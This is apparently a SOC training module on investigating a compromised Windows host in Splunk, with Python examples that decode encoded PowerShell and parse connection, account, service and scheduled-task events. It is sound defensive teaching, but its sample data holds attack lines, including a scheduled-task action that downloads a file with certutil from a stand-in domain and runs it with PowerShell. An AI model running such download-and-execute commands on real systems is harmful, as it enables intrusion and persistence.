Splunk
Malicious Process Execution
Let’s consider a situation where you’ve received an alert about the execution of a suspicious encoded PowerShell command and now need to analyse the activity. How would you use a SIEM in this case? Let’s write a Splunk search and see what useful information the logs contain. Sysmon Event ID 1 (Process Create) records every launched process together with its command line and parent, so we search for EventCode=1 events related to PowerShell that include the EncodedCommand argument.
index=winenv EventCode=1 *powershell* AND *EncodedCommand* | table _time ComputerName ParentUser ParentImage ParentCommandLine Image CommandLine
In this example, the results show that on host WINHOST05 a malicious update_config.js file was executed from the C:\Users\Public directory, which resulted in cmd.exe launching PowerShell with an encoded command. The value passed to -EncodedCommand is Base64 of the UTF-16LE script text, so it can be decoded offline to see what was actually run.
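The decoding step described above, as an added example that is not part of the original module: it runs the same filter as the Splunk search over a few constructed Sysmon Event ID 1 records (hostnames, users, paths and the payload are illustrative), finds the EncodedCommand argument in any of its common spellings, Base64-decodes it as UTF-16LE, and returns the decoded script together with the parent process chain an analyst needs for the timeline.

```python
import base64
import re
from typing import Optional

# Constructed Sysmon Event ID 1 (Process Create) records shaped like the fields the Splunk
# search tables. Hostnames, users, paths and the payload are illustrative, not real telemetry.
PAYLOAD = r"Start-Process C:\Users\Public\Temp\PPn423.exe -WindowStyle Hidden"


def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [
    {
        "_time": "2024-05-01T10:12:03",
        "ComputerName": "WINHOST05",
        "ParentUser": "WINHOST05\\ted-admin",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r'cmd.exe /c wscript.exe "C:\Users\Public\update_config.js"',
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_powershell(PAYLOAD),
    },
    {   # benign: a scheduled admin script run by path, no encoded argument
        "_time": "2024-05-01T10:15:44",
        "ComputerName": "WINHOST02",
        "ParentUser": "CORP\\svc-backup",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "ParentCommandLine": "svchost.exe -k netsvcs -p -s Schedule",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand. -e, -ec and -enc are the
# spellings seen most often, so match those plus the full name, case-insensitively.
# The lookbehind requires the dash to start a token, so "-ExecutionPolicy" does not match.
ENCODED_ARG = re.compile(r"(?i)(?<!\S)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/]+={0,2})")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script if the command line carries a decodable -EncodedCommand, else None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script text as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None  # looks like the flag but is not a valid payload (bad alphabet, padding, odd length)


def triage_encoded_powershell(events: list) -> list:
    """Keep only PowerShell process-create events whose command line decodes, and attach the
    decoded script plus the parent chain (who launched it, from what) for the analyst's timeline."""
    hits = []
    for ev in events:
        if "powershell" not in ev["Image"].lower():
            continue
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded is None:
            continue
        hits.append({
            "time": ev["_time"],
            "host": ev["ComputerName"],
            "parent_user": ev["ParentUser"],
            "parent": ev["ParentCommandLine"],
            "decoded": decoded,
        })
    return hits


if __name__ == "__main__":
    for hit in triage_encoded_powershell(SAMPLE_EVENTS):
        print(f"{hit['time']} {hit['host']} {hit['parent_user']}")
        print(f"  parent : {hit['parent']}")
        print(f"  decoded: {hit['decoded']}")
```

Decoding with `validate=True` matters in practice: attackers and red teams sometimes pad or mangle the argument, and a decoder that silently accepts junk will hand you an empty or misleading script instead of telling you the argument was not what it appeared to be.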
Note: The activities in the following examples will not be visible in your Splunk instance; it only contains logs for your practical tasks.
Suspicious Network Connection
This story didn’t end there: just a few minutes later we received another alert from WINHOST05, this time about a suspicious network connection. Let’s try to determine what happened using Sysmon logs. To do this, we will search for EventCode 3 (Network connection detected), which records the initiating process and both endpoints of each connection, and filter by the host WINHOST05, since that is where the activity originated.
index=winenv EventCode=3 ComputerName=WINHOST05 | table _time ComputerName Image SourceIp SourcePort DestinationIp DestinationPort Protocol
As shown in the image below, a suspicious connection was initiated by the process PPn423.exe, running from a Temp folder, to the unusual port 9999 on the IP address 83.222.191.2. A process executing from a user-writable directory and talking to a public address on a non-standard port is a combination worth escalating on its own; we also recommend checking this IP on threat intelligence (TI) platforms.
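The triage reasoning above, as an added example that is not part of the original module: it applies the two indicators the text relies on (process path in a user-writable directory, public destination on a non-standard port) to a few constructed Sysmon Event ID 3 records for WINHOST05, and collects the public addresses that should go to a TI lookup. The port allow-list is an assumption to be tuned per environment; the addresses and paths are illustrative.

```python
import ipaddress

# Constructed Sysmon Event ID 3 (Network connection) records from WINHOST05, shaped like the
# fields the Splunk search tables. Addresses, ports and process paths are illustrative.
SAMPLE_CONNECTIONS = [
    {"_time": "2024-05-01T10:14:51", "ComputerName": "WINHOST05",
     "Image": r"C:\Users\ted-admin\AppData\Local\Temp\PPn423.exe",
     "SourceIp": "10.10.5.23", "SourcePort": 51322,
     "DestinationIp": "83.222.191.2", "DestinationPort": 9999, "Protocol": "tcp"},
    {"_time": "2024-05-01T10:15:02", "ComputerName": "WINHOST05",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "SourceIp": "10.10.5.23", "SourcePort": 51330,
     "DestinationIp": "142.250.74.36", "DestinationPort": 443, "Protocol": "tcp"},
    {"_time": "2024-05-01T10:15:20", "ComputerName": "WINHOST05",
     "Image": r"C:\Windows\System32\svchost.exe",
     "SourceIp": "10.10.5.23", "SourcePort": 51341,
     "DestinationIp": "10.10.5.5", "DestinationPort": 445, "Protocol": "tcp"},
]

# Directories that installed, signed software does not normally execute from.
USER_WRITABLE_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\",
                      "\\users\\public\\", "\\programdata\\")
# Destination ports that routinely carry legitimate outbound traffic from a workstation.
# This is an assumption for the example; tune it to the environment being monitored.
EXPECTED_OUTBOUND_PORTS = {80, 443, 53, 123, 587, 993}


def connection_findings(ev: dict) -> list:
    """Return the reasons a single network-connection event looks suspicious (empty if none)."""
    findings = []
    image = ev["Image"].lower()
    dst = ipaddress.ip_address(ev["DestinationIp"])
    if any(d in image for d in USER_WRITABLE_DIRS):
        findings.append(f"process runs from a user-writable directory: {ev['Image']}")
    # is_global is False for RFC 1918, loopback, link-local and other reserved ranges,
    # so internal SMB/RDP traffic on unusual ports is not flagged by this rule.
    if dst.is_global and ev["DestinationPort"] not in EXPECTED_OUTBOUND_PORTS:
        findings.append(f"non-standard port {ev['DestinationPort']}/{ev['Protocol']} "
                        f"to public address {dst}")
    return findings


def triage_connections(events: list) -> list:
    """Attach findings to every event that has at least one; drop the rest."""
    return [dict(ev, findings=f) for ev in events if (f := connection_findings(ev))]


def ips_for_ti_lookup(events: list) -> list:
    """Public destination addresses from flagged events: the ones worth checking on a TI platform."""
    return sorted({ev["DestinationIp"] for ev in triage_connections(events)
                   if ipaddress.ip_address(ev["DestinationIp"]).is_global})


if __name__ == "__main__":
    for ev in triage_connections(SAMPLE_CONNECTIONS):
        print(ev["_time"], ev["Image"], "->", f"{ev['DestinationIp']}:{ev['DestinationPort']}")
        for reason in ev["findings"]:
            print("   -", reason)
    print("check on TI:", ips_for_ti_lookup(SAMPLE_CONNECTIONS))
```

Note that the path rule and the port rule are independent on purpose: a Chrome connection to port 443 trips neither, a Temp-folder binary talking to 443 still trips the first, and an installed tool beaconing to port 9999 still trips the second.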
User Creation
A SOC analyst started a new shift and was handed information about suspicious activity on a host. Within just a couple of hours, another alert came in from the same machine, this time about a user account creation, which suggests the attacker is still present on the host. We need to review the Security log, where Event ID 4720 records an account being created and 4722 records it being enabled, and share what we find with our SOC L2 analyst.
index=winenv EventCode=4720 OR EventCode=4722 | table _time EventCode ComputerName Subject_Account_Name Target_Account_Name New_Account_Account_Name Keywords
The attacker likely created a backup user account as a persistence mechanism: the account was created and enabled by ted-admin on the WINHOST05 host. Pairing the 4720 and 4722 events for the same target account tells us both who created it and that it is usable for logon.
Service Creation and Service Start/Stop Events
We will use two event codes from the System log: 7045, which indicates that a new service was installed (and records its name, binary path and the account it runs as), and 7036, which indicates that a service entered the running or stopped state.
index=winenv EventCode=7045 OR EventCode=7036 ComputerName=WINHOST05 | table _time EventCode ComputerName Service_Name Service_Account Service_File_Name Message
From the search results, we can see that on the host a service named "User Updates" was created and started, which launches the malicious RNSfnsjdf.exe file from the Temp directory under the SYSTEM account. This is most likely a privilege escalation attempt: we recall that the attacker previously only had access to the ted-admin account, and a service running as LocalSystem executes with full system privileges.
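Both the User Creation section (4720 paired with 4722) and this section (7045 paired with 7036) rely on the same move: matching a "created" event with its follow-up event for the same object on the same host within a short window. The following is an added example that is not part of the original module: one generic correlation helper, applied to constructed Security and System log records (names, times and the 7045/7036 message bodies are illustrative, shaped like the real event text), that reports which new accounts were actually enabled and which new services were actually started, and flags the combination the text calls out, a binary in a user-writable directory running as LocalSystem.

```python
import re
from datetime import datetime, timedelta
from typing import Callable, Optional

# Constructed Windows event records shaped like the fields the two Splunk searches table:
# Security log 4720/4722 for accounts, System log 7045/7036 for services. Illustrative data.
SECURITY_EVENTS = [
    {"_time": "2024-05-01T12:02:10", "EventCode": 4720, "ComputerName": "WINHOST05",
     "Subject_Account_Name": "ted-admin", "Target_Account_Name": "backup"},
    {"_time": "2024-05-01T12:02:10", "EventCode": 4722, "ComputerName": "WINHOST05",
     "Subject_Account_Name": "ted-admin", "Target_Account_Name": "backup"},
    # Helpdesk re-enabling an existing account: a 4722 with no matching 4720, so not a new account.
    {"_time": "2024-05-01T08:30:00", "EventCode": 4722, "ComputerName": "WINHOST02",
     "Subject_Account_Name": "helpdesk01", "Target_Account_Name": "j.smith"},
]
SYSTEM_EVENTS = [
    {"_time": "2024-05-01T12:40:05", "EventCode": 7045, "ComputerName": "WINHOST05",
     "Message": ("A service was installed in the system.\n\n"
                 "Service Name:  User Updates\n"
                 "Service File Name:  C:\\Users\\ted-admin\\AppData\\Local\\Temp\\RNSfnsjdf.exe\n"
                 "Service Type:  user mode service\n"
                 "Service Start Type:  auto start\n"
                 "Service Account:  LocalSystem")},
    {"_time": "2024-05-01T12:40:06", "EventCode": 7036, "ComputerName": "WINHOST05",
     "Message": "The User Updates service entered the running state."},
    {"_time": "2024-05-01T12:41:00", "EventCode": 7036, "ComputerName": "WINHOST05",
     "Message": "The Windows Update service entered the stopped state."},
]

SVC_FIELD = re.compile(r"^(Service Name|Service File Name|Service Account):\s+(.*)$", re.M)
SVC_STATE = re.compile(r"^The (.+) service entered the (\w+) state\.")
USER_WRITABLE_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\",
                      "\\users\\public\\", "\\programdata\\")


def _ts(ev: dict) -> datetime:
    return datetime.fromisoformat(ev["_time"])


def correlate(events: list, first_code: int, second_code: int,
              key: Callable[[dict], Optional[str]],
              accept: Callable[[dict], bool] = lambda ev: True,
              window: timedelta = timedelta(minutes=10)) -> list:
    """Pair every `first_code` event with the earliest acceptable `second_code` event on the
    same host that shares key(ev) and occurs within `window` after it. Unpaired first events are
    kept with second=None, so "created but never enabled/started" stays visible."""
    followers: dict = {}
    for ev in sorted(events, key=_ts):
        if ev["EventCode"] == second_code and accept(ev) and key(ev) is not None:
            followers.setdefault((ev["ComputerName"], key(ev)), []).append(ev)
    pairs = []
    for ev in sorted(events, key=_ts):
        if ev["EventCode"] != first_code:
            continue
        k = (ev["ComputerName"], key(ev))
        follow = next((c for c in followers.get(k, [])
                       if timedelta(0) <= _ts(c) - _ts(ev) <= window), None)
        pairs.append({"host": ev["ComputerName"], "key": k[1], "first": ev, "second": follow})
    return pairs


def parse_7045(message: str) -> dict:
    """Pull the 'Field:  value' lines out of a 7045 message body."""
    return {m.group(1): m.group(2).strip() for m in SVC_FIELD.finditer(message)}


def service_name(ev: dict) -> Optional[str]:
    """Service name from either a 7045 body or a 7036 state-change sentence."""
    if ev["EventCode"] == 7045:
        return parse_7045(ev["Message"]).get("Service Name")
    m = SVC_STATE.match(ev["Message"])
    return m.group(1) if m else None


def new_accounts(events: list) -> list:
    """4720 (created) paired with 4722 (enabled) by target account."""
    return [{"host": p["host"], "account": p["key"],
             "created_by": p["first"]["Subject_Account_Name"],
             "enabled": p["second"] is not None}
            for p in correlate(events, 4720, 4722, lambda ev: ev["Target_Account_Name"])]


def new_services(events: list) -> list:
    """7045 (installed) paired with the 7036 'running' event by service name, plus a flag for a
    binary in a user-writable directory that runs as LocalSystem."""
    out = []
    for p in correlate(events, 7045, 7036, service_name,
                       accept=lambda ev: "running state" in ev["Message"]):
        info = parse_7045(p["first"]["Message"])
        binary = info.get("Service File Name", "")
        account = info.get("Service Account")
        out.append({"host": p["host"], "service": p["key"], "binary": binary,
                    "account": account, "started": p["second"] is not None,
                    "suspicious": account == "LocalSystem"
                    and any(d in binary.lower() for d in USER_WRITABLE_DIRS)})
    return out
```

The helpdesk 4722 in the sample is there to show why the pairing direction matters: enabling an existing account is routine and produces only a 4722, so keying the search on the 4720 (creation) and looking forward for the 4722 avoids surfacing every re-enable as a new account.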
Persistence Mechanisms
Scheduled Tasks
To start, we’ll query the task name AssessmentTaskOne along with Event ID 4698, which indicates that a scheduled task was created. Since we also know the exact time of the activity, we can filter by timestamp to narrow the search. Note: For now, we won’t filter by host, so we can check whether the activity is isolated to a single machine or present across multiple hosts.
index="win-alert" EventCode=4698 AssessmentTaskOne | table _time EventCode user_name host Task_Name Message
From our search, we can see that there’s only a single event related to this activity.

Now, let’s look at the Message field, which carries the full task definition as XML (the Task Content), to understand what this task actually does. Let’s go step by step, starting with the Triggers section.
We can see that the task runs every day at the same time on a user workstation, which is quite unusual. Let’s continue by analysing the Message field, focusing on the Exec and Principals sections, to see what task is being executed and under which user account.
At this point, we can already see the first signs of malicious activity. The task uses certutil to download rv.exe from the tryhotme domain into the Temp folder under the name DataCollector.exe, and then launches that file with a PowerShell Start-Process command. All of this runs under the user oliver.thompson. This is a clear example of persistence: the download and execution repeat every day without any further action from the attacker.
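The step-by-step walk through the Message field above, as an added example that is not part of the original module: it parses the Task Content XML out of a constructed 4698 message (the user, paths and the `tryhotme.invalid` URL are illustrative; `.invalid` is a reserved TLD and not a real host), pulls the Triggers, Principals and Exec sections the text inspects, and turns them into the findings an analyst would write up, including the certutil download and the Start-Process launch.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by the Windows Task Scheduler task definition schema.
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Constructed Security event 4698 Message. As in the real event, the task definition follows
# "Task Content:" as XML. The user, paths and URL are illustrative (.invalid is not a real domain).
SAMPLE_4698_MESSAGE = """A scheduled task was created.

Subject:
    Account Name:       oliver.thompson
    Account Domain:     CORP

Task Information:
    Task Name:          \\AssessmentTaskOne
    Task Content:       <?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-05-01T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>CORP\\oliver.thompson</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>cmd.exe</Command>
      <Arguments>/c certutil.exe -urlcache -split -f http://tryhotme.invalid/rv.exe C:\\Windows\\Temp\\DataCollector.exe &amp;&amp; powershell.exe -c "Start-Process C:\\Windows\\Temp\\DataCollector.exe"</Arguments>
    </Exec>
  </Actions>
</Task>"""

URL = re.compile(r"https?://\S+", re.I)


def parse_task_content(message: str) -> dict:
    """Extract triggers, the principal the task runs as, and the Exec actions from a 4698 message."""
    start = message.find("<Task")
    if start < 0:
        raise ValueError("no task XML in message")
    # Start at <Task> so the encoding="UTF-16" declaration is skipped; expat rejects it on a str.
    root = ET.fromstring(message[start:])

    triggers = []
    triggers_el = root.find(f"{TASK_NS}Triggers")
    for trig in (list(triggers_el) if triggers_el is not None else []):
        days = trig.findtext(f"{TASK_NS}ScheduleByDay/{TASK_NS}DaysInterval")
        triggers.append({"type": trig.tag.replace(TASK_NS, ""),
                         "start": trig.findtext(f"{TASK_NS}StartBoundary"),
                         "days_interval": int(days) if days else None})

    principal = root.find(f"{TASK_NS}Principals/{TASK_NS}Principal")
    actions = []
    for ex in root.iter(f"{TASK_NS}Exec"):
        cmd = ex.findtext(f"{TASK_NS}Command") or ""
        args = ex.findtext(f"{TASK_NS}Arguments") or ""
        actions.append(f"{cmd} {args}".strip())

    return {
        "triggers": triggers,
        "run_as": principal.findtext(f"{TASK_NS}UserId") if principal is not None else None,
        "run_level": principal.findtext(f"{TASK_NS}RunLevel") if principal is not None else None,
        "actions": actions,
    }


def assess_task(task: dict) -> list:
    """Findings an analyst would write up, in the order the text walks the Message field."""
    findings = []
    for t in task["triggers"]:
        if t["type"] == "CalendarTrigger" and t["days_interval"] == 1:
            findings.append(f"runs every day at {(t['start'] or '')[11:]} (recurring, not a one-off)")
    for action in task["actions"]:
        low = action.lower()
        if "certutil" in low and "-urlcache" in low:
            findings.append("certutil -urlcache used as a downloader")
        for url in URL.findall(action):
            findings.append(f"downloads from {url}")
        if re.search(r"\\(temp|public)\\", low):
            findings.append("stages the payload in a Temp/Public directory")
        if "start-process" in low:
            findings.append("executes the downloaded file via PowerShell Start-Process")
    if task["run_as"]:
        findings.append(f"runs as {task['run_as']} ({task['run_level']})")
    return findings


if __name__ == "__main__":
    for line in assess_task(parse_task_content(SAMPLE_4698_MESSAGE)):
        print("-", line)
```

Parsing the XML rather than grepping the Message field is what makes the Principals check reliable: the UserId and RunLevel sit in their own elements, so a task that runs as a different account than the one that created it, or with HighestAvailable instead of LeastPrivilege, is one field comparison away.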